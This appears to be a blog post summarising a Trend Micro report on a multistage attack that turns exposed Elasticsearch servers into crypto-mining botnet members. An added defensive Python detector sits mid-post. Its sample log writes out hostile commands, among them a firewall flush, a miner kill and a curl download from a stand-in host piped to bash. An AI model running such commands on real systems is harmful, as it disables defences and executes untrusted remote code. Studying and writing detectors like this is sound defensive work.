Cyberattack on Elasticsearch Databases turns DBs into Zombies/Botnets



Recently a new cyberattack was added to the list of attacks against Elasticsearch, one that turns Elasticsearch databases into zombies, i.e. members of a botnet.

There is a list of attacks conducted on Elasticsearch databases in the past few years. The new one is causing more concern among security experts because of its complexity and the tactics it uses to evade security controls and carry the attack through to completion.

Elasticsearch is a popular tool that helps companies manage billions of records in a database easily. Its source code is open, and big companies like Netflix, Uber, Dell, and Adobe already use Elasticsearch. I hope you now understand how important it is for hackers to find vulnerabilities in this tool and exploit them to gain control of systems.

Recently, Trend Micro, a cybersecurity company, revealed that hackers had targeted publicly available Elasticsearch databases by delivering a backdoor as a payload.

The attack requires multiple scripts to be executed on the system, starting with disabling the system firewall and stopping all the crypto mining processes already running on the system. Once these tasks are completed successfully, the hackers download another script from a compromised or grey website to the server.

If you are a blogger and wondering why bots are trying to break into your blog, this is mostly why they do that: hackers use compromised websites as staging points for large cyberattacks. Well, this is another topic for another day.

If the system detects and blocks the URL used to download the malicious script, the hackers can easily switch to a different URL.

It is a profit-driven attack

This particular type of attack is profit-driven. In the first step, the hackers disabled the firewall and then killed any cryptocurrency mining processes already running, so that they could start their own crypto mining processes in their place.
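The chain described above and in the earlier paragraph (firewall disabled, existing miners killed, a further script fetched from a remote site and executed) is a poor fit for single-event detection, because each step on its own is something an administrator also does. What makes it a red flag is the correlation. The following is an added example, not code from the article or from Trend Micro, of how a defender might correlate those three stages over a window of recorded command lines. The command-line patterns and the sample log are constructed here for illustration and are not indicators from the Trend Micro report.

```python
import re

# Constructed sample of command lines, as a host agent (e.g. auditd execve
# events reduced to their argv) might record them. Invented for this example;
# not telemetry from the Trend Micro write-up.
SAMPLE_COMMANDS = [
    "ls -la /var/lib/elasticsearch",
    "systemctl stop firewalld",
    "iptables -F",
    "pkill -9 -f miner",
    "curl -fsSL http://stage2.example.invalid/s.sh | bash",
    "tail -n 50 /var/log/elasticsearch/cluster.log",
]

# Constructed benign administration session for comparison.
BENIGN_COMMANDS = [
    "systemctl restart elasticsearch",
    "iptables -L -n",
    "curl -s http://localhost:9200/_cluster/health",
]

# One regex per stage of the chain the article describes.
STAGE_PATTERNS = {
    "firewall_disabled": re.compile(
        r"(\bsystemctl\s+(stop|disable)\s+(firewalld|ufw)\b"
        r"|\bufw\s+disable\b"
        r"|\biptables\s+(-F|--flush)\b"
        r"|\bsetenforce\s+0\b)"
    ),
    "processes_killed": re.compile(r"\b(pkill|killall)\b|\bkill\s+-9\b"),
    "remote_script_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*https?://[^|]*\|\s*(ba|z|da)?sh\b"
    ),
}


def classify(command):
    """Return the set of stage names whose pattern matches this command line."""
    return {name for name, rx in STAGE_PATTERNS.items() if rx.search(command)}


def detect_multistage(commands, window=5):
    """Correlate the three stages across a sliding window of commands.

    Returns (alert, stages_seen, matching_commands). `alert` is True only
    when every stage appears within `window` consecutive commands of the
    first matching one. Any single stage is noisy on its own (admins flush
    iptables too), so the correlation is what carries the signal.
    """
    hits = [(i, cmd, classify(cmd)) for i, cmd in enumerate(commands)]
    hits = [h for h in hits if h[2]]
    for start in range(len(hits)):
        first_index = hits[start][0]
        seen, matched = set(), []
        for index, cmd, stages in hits[start:]:
            if index - first_index >= window:
                break
            seen |= stages
            matched.append(cmd)
            if seen == set(STAGE_PATTERNS):
                return True, seen, matched
    all_seen = set().union(*(h[2] for h in hits)) if hits else set()
    return False, all_seen, [h[1] for h in hits]


if __name__ == "__main__":
    for label, session in (("suspicious", SAMPLE_COMMANDS), ("benign", BENIGN_COMMANDS)):
        alert, stages, matched = detect_multistage(session)
        print(f"{label}: alert={alert} stages={sorted(stages)}")
        for cmd in matched:
            print("   ", cmd)
```

The window size is the tuning knob: the constructed session trips the alert with the default of five commands but not with a window of two, which is the trade-off between catching a slow-moving operator and tolerating an administrator who happens to flush a firewall and kill a runaway process in the same hour.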

Trend Micro also detected the malware named BillGates, which steals system information and can launch DDoS attacks. The BillGates malware was first encountered in 2014. You can read about it on the Akamai website.

The post also draws attention to how dangerous this technique is: it evades system detection and still completes its task. Trend Micro also mentions that such attacks could be a test run for a bigger cyberattack in the future.

An attack that takes precautions to evade detection and uses multistage execution techniques is a red flag…

Trend Micro

For a more detailed analysis of the attack, please head over to the Trend Micro website. They have also provided images of the scripts and described how each script does its job.